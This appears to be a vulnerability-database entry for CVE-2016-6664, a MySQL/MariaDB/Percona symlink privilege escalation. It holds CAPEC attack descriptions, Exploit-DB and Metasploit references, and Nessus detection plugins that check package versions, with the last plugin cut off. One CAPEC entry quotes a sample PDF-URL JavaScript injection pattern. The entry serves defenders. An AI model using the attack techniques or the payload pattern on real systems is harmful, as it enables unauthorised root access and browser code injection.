CVE-2016-6664 - Link Following vulnerability in multiple products
Attack vector | LOCAL |
Attack complexity | HIGH |
Privileges required | LOW |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Summary
mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logging, allows local users with access to the mysql account to gain root privileges via a symlink attack on error logs and possibly other files.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Symlink Attack: An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
- Accessing, Modifying or Executing Executable Files: An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
- Leverage Executable Code in Non-Executable Files: An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/): `http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here`. The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Manipulating Input to File System Calls: An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
Exploit-Db
description | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation. CVE-2016-5617,CVE-2016-6664. Local exploit for Linux platform |
file | exploits/linux/local/40679.sh |
id | EDB-ID:40679 |
last seen | 2016-11-02 |
modified | 2016-11-01 |
platform | linux |
port | |
published | 2016-11-01 |
reporter | Dawid Golunski |
source | https://www.exploit-db.com/download/40679/ |
title | MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation |
type | local |
Metasploit
id | MSF:EXPLOIT/LINUX/LOCAL/MYSQL_PRIV_ESC |
last seen | 2017-01-23 |
modified | 1970-01-01 |
published | 2016-11-25 |
references | |
reliability | Good |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/mysql_priv_esc.rb |
title | CVE-2016-6664 MySQL / MariaDB / Percona - Root Privilege Escalation |
Nessus
NASL family | Slackware Local Security Checks |
NASL id | SLACKWARE_SSA_2017-018-01.NASL |
description | New mariadb packages are available for Slackware 14.1, 14.2, and -current to fix security issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 96612 |
published | 2017-01-19 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/96612 |
title | Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01) |
code |

    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Slackware Security Advisory 2017-018-01. The text
    # itself is copyright (C) Slackware Linux, Inc.
    #

    include("compat.inc");

    if (description)
    {
      script_id(96612);
      script_version("3.4");
      script_cvs_date("Date: 2019/04/10 16:10:18");

      script_cve_id("CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318");
      script_xref(name:"SSA", value:"2017-018-01");

      script_name(english:"Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)");
      script_summary(english:"Checks for updated package in /var/log/packages");

      script_set_attribute(
        attribute:"synopsis",
        value:"The remote Slackware host is missing a security update."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "New mariadb packages are available for Slackware 14.1, 14.2, and -current to fix security issues."
      );
      # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?48ee8594"
      );
      script_set_attribute(
        attribute:"solution",
        value:"Update the affected mariadb package."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");

      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:slackware:slackware_linux:mariadb");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.1");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:slackware:slackware_linux:14.2");

      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/18");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/19");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Slackware Local Security Checks");

      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/Slackware/release", "Host/Slackware/packages");

      exit(0);
    }

    include("audit.inc");
    include("global_settings.inc");
    include("slackware.inc");

    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/Slackware/release")) audit(AUDIT_OS_NOT, "Slackware");
    if (!get_kb_item("Host/Slackware/packages")) audit(AUDIT_PACKAGE_LIST_MISSING);

    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Slackware", cpu);

    flag = 0;
    if (slackware_check(osver:"14.1", pkgname:"mariadb", pkgver:"5.5.54", pkgarch:"i486", pkgnum:"1_slack14.1")) flag++;
    if (slackware_check(osver:"14.1", arch:"x86_64", pkgname:"mariadb", pkgver:"5.5.54", pkgarch:"x86_64", pkgnum:"1_slack14.1")) flag++;
    if (slackware_check(osver:"14.2", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"i586", pkgnum:"1_slack14.2")) flag++;
    if (slackware_check(osver:"14.2", arch:"x86_64", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"x86_64", pkgnum:"1_slack14.2")) flag++;
    if (slackware_check(osver:"current", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"i586", pkgnum:"1")) flag++;
    if (slackware_check(osver:"current", arch:"x86_64", pkgname:"mariadb", pkgver:"10.0.29", pkgarch:"x86_64", pkgnum:"1")) flag++;

    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");

NASL family | Oracle Linux Local Security Checks |
NASL id | ORACLELINUX_ELSA-2017-2192.NASL |
description | From Red Hat Security Advisory 2017:2192 : An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933) Security Fix(es) : * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 102299 |
published | 2017-08-09 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/102299 |
title | Oracle Linux 7 : mariadb (ELSA-2017-2192) |
code |

    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Red Hat Security Advisory RHSA-2017:2192 and
    # Oracle Linux Security Advisory ELSA-2017-2192 respectively.
    #

    include("compat.inc");

    if (description)
    {
      script_id(102299);
      script_version("3.9");
      script_cvs_date("Date: 2019/09/27 13:00:38");

      script_cve_id("CVE-2016-5483", "CVE-2016-5617", "CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3302", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3312", "CVE-2017-3313", "CVE-2017-3317", "CVE-2017-3318", "CVE-2017-3453", "CVE-2017-3456", "CVE-2017-3464", "CVE-2017-3600", "CVE-2017-3651");
      script_xref(name:"RHSA", value:"2017:2192");

      script_name(english:"Oracle Linux 7 : mariadb (ELSA-2017-2192)");
      script_summary(english:"Checks rpm output for the updated packages");

      script_set_attribute(
        attribute:"synopsis",
        value:"The remote Oracle Linux host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "From Red Hat Security Advisory 2017:2192 :

    An update for mariadb is now available for Red Hat Enterprise Linux 7.

    Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

    MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.

    The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933)

    Security Fix(es) :

    * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600)

    * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664)

    * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265)

    * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291)

    * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312)

    * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302)

    * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464)

    Additional Changes :

    For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://oss.oracle.com/pipermail/el-errata/2017-August/007090.html"
      );
      script_set_attribute(
        attribute:"solution",
        value:"Update the affected mariadb packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");

      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-bench");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-embedded");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-embedded-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-libs");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-server");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mariadb-test");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7");

      script_set_attribute(attribute:"vuln_publication_date", value:"2016/10/25");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/08/08");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/08/09");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Oracle Linux Local Security Checks");

      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

      exit(0);
    }

    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");

    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
    os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
    os_ver = os_ver[1];
    if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver);

    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
    if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);

    flag = 0;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-bench-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-devel-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-embedded-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-embedded-devel-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-libs-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-server-5.5.56-2.el7")) flag++;
    if (rpm_check(release:"EL7", cpu:"x86_64", reference:"mariadb-test-5.5.56-2.el7")) flag++;

    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mariadb / mariadb-bench / mariadb-devel / mariadb-embedded / etc");
    }

NASL family | SuSE Local Security Checks |
NASL id | SUSE_SU-2017-0412-1.NASL |
description | This mariadb version update to 10.0.29 fixes the following issues : - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: unrestricted mysqld_safe |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 97064 |
published | 2017-02-08 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/97064 |
title | SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1) |
code |

    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from SUSE update advisory SUSE-SU-2017:0412-1.
    # The text itself is copyright (C) SUSE.
    #

    include("compat.inc");

    if (description)
    {
      script_id(97064);
      script_version("3.8");
      script_cvs_date("Date: 2019/09/11 11:22:14");

      script_cve_id("CVE-2016-6664", "CVE-2017-3238", "CVE-2017-3243", "CVE-2017-3244", "CVE-2017-3257", "CVE-2017-3258", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3312", "CVE-2017-3317", "CVE-2017-3318");

      script_name(english:"SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2017:0412-1)");
      script_summary(english:"Checks rpm output for the updated packages.");

      script_set_attribute(
        attribute:"synopsis",
        value:"The remote SUSE host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "This mariadb version update to 10.0.29 fixes the following issues :

      - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896)
      - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894)
      - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)
      - CVE-2017-3291: unrestricted mysqld_safe's ledir (bsc#1020884)
      - CVE-2017-3265: unsafe chmod/chown use in init script (bsc#1020885)
      - CVE-2017-3258: unspecified vulnerability in the DDL component (bsc#1020875)
      - CVE-2017-3257: unspecified vulnerability affecting InnoDB (bsc#1020878)
      - CVE-2017-3244: unspecified vulnerability affecing the DML component (bsc#1020877)
      - CVE-2017-3243: unspecified vulnerability affecting the Charsets component (bsc#1020891)
      - CVE-2017-3238: unspecified vulnerability affecting the Optimizer component (bsc#1020882)
      - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)
      - Applications using the client library for MySQL (libmysqlclient.so) had a use-after-free issue that could cause the applications to crash (bsc#1022428)
      - notable changes :
      - XtraDB updated to 5.6.34-79.1
      - TokuDB updated to 5.6.34-79.1
      - Innodb updated to 5.6.35
      - Performance Schema updated to 5.6.35 Release notes and changelog :
      - https://kb.askmonty.org/en/mariadb-10029-release-notes
      - https://kb.askmonty.org/en/mariadb-10029-changelog

    Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."
      );
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1008253");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020868");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020873");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020875");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020877");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020878");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020882");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020884");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020885");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020891");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020894");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1020896");
      script_set_attribute(attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=1022428");
      # https://kb.askmonty.org/en/mariadb-10029-changelog
      script_set_attribute(attribute:"see_also", value:"https://mariadb.com/kb/en/library/mariadb-10029-changelog/");
      # https://kb.askmonty.org/en/mariadb-10029-release-notes
      script_set_attribute(attribute:"see_also", value:"https://mariadb.com/kb/en/library/mariadb-10029-release-notes/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-6664/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3238/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3243/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3244/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3257/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3258/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3265/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3291/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3312/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3317/");
      script_set_attribute(attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2017-3318/");
      # https://www.suse.com/support/update/announcement/2017/suse-su-20170412-1/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?14c3ceff");
      script_set_attribute(
        attribute:"solution",
        value:
    "To install this SUSE Security Update use YaST online_update.
    Alternatively you can run the command listed for your product :

    SUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch SUSE-SLE-WE-12-SP2-2017-207=1

    SUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch SUSE-SLE-WE-12-SP1-2017-207=1

    SUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t patch SUSE-SLE-SDK-12-SP2-2017-207=1

    SUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t patch SUSE-SLE-SDK-12-SP1-2017-207=1

    SUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t patch SUSE-SLE-RPI-12-SP2-2017-207=1

    SUSE Linux Enterprise Server 12-SP2:zypper in -t patch SUSE-SLE-SERVER-12-SP2-2017-207=1

    SUSE Linux Enterprise Server 12-SP1:zypper in -t patch SUSE-SLE-SERVER-12-SP1-2017-207=1

    SUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch SUSE-SLE-DESKTOP-12-SP2-2017-207=1

    SUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2017-207=1

    To bring your system up-to-date, use 'zypper patch'."
      );
      script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_malware", value:"true");

      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient18");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:libmysqlclient_r18");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-errormessages");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-tools");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");

      script_set_attribute(attribute:"vuln_publication_date", value:"2016/12/13");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/02/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/02/08");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"SuSE Local Security Checks");

      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

      exit(0);
    }

    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");

    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
    os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
    os_ver = os_ver[1];
    if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver);

    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

    sp = get_kb_item("Host/SuSE/patchlevel");
    if (isnull(sp)) sp = "0";
